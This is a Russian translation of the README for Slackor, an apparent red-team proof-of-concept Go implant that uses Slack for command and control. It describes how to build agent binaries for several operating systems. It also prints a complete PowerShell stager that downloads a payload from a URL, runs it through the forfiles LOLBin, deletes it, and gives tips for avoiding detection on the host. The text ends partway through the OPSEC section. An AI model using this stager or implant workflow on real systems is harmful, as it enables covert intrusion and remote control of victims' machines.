
Имплант на Golang, использующий Slack в качестве сервера управления и контроля
Поддерживается на https://github.com/n00py/Slackor
Имплант на Golang, использующий Slack в качестве канала управления и команд (C2).
Этот проект был вдохновлён Gcat и Twittor.
Этот инструмент выпущен как доказательство концепции. Обязательно прочитайте и поймите Политику разработчика приложений Slack перед созданием любых приложений Slack.
Примечание: сервер написан на Python 3
Для работы вам потребуется:
Рабочее пространство Slack
Зарегистрировать приложение со следующими разрешениями:
Создать бота
Этот репозиторий содержит пять файлов:
install.sh Устанавливает зависимостиsetup.py Скрипт для создания каналов Slack, базы данных и имплантаagent.py Скрипт для генерации новых имплантовserver.py Сервер Slackor, предназначенный для запуска на Linuxagent.go Имплант на Golangrequirements.txt Зависимости Python (устанавливаются автоматически)Чтобы начать:
go get github.com/Coalfire-Research/Slackorcd $GOPATH/src/github.com/Coalfire-Research/Slackorinstall.shsetup.py
После успешного выполнения скрипта в каталоге dist/ будут созданы несколько файлов:
agent.windows.exe: 64-битный бинарник для Windowsagent.upx.exe: 64-битный бинарник для Windows, упакованный UPXagent.darwin: 64-битный бинарник для macOSagent.32.linux: 32-битный бинарник для Linuxagent.64.linux: 64-битный бинарник для LinuxПосле запуска server.py на хосте Linux выполните тот агент из перечисленных выше, который подходит для вашей целевой системы.
Запустите модуль "stager", чтобы сгенерировать однострочную команду и другие дропперы.
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe
Это выполнит InvokeWebRequest (PS v.3+) для загрузки полезной нагрузки, запустит её с помощью LOLBin, а затем удалит себя после завершения. Это рабочий пример, но команду можно изменить для использования другого метода загрузки или выполнения.
Введите "help" или нажмите [TAB], чтобы увидеть список доступных команд. Введите "help [COMMAND]", чтобы увидеть описание этой команды.
(Slackor)
Когда агент подключается, вы можете взаимодействовать с ним. Используйте "interact [AGENT]" для входа в режим взаимодействия с агентом. Введите "help" или нажмите [TAB], чтобы увидеть список доступных команд.
(Slackor:AGENT)
Вывод команд и загруженные файлы шифруются с помощью AES в дополнение к транспортному шифрованию TLS Slack.
Модули предупредят вас перед выполнением задач, которые записывают на диск.
При выполнении команд оболочки обратите внимание, что будут запущены cmd.exe/bash. Это может отслеживаться на хосте.
Вот несколько безопасных с точки зрения OPSEC команд, которые НЕ будут выполнять cmd.exe/bash:
Безопасно ли это использовать для красных команд/пентеста?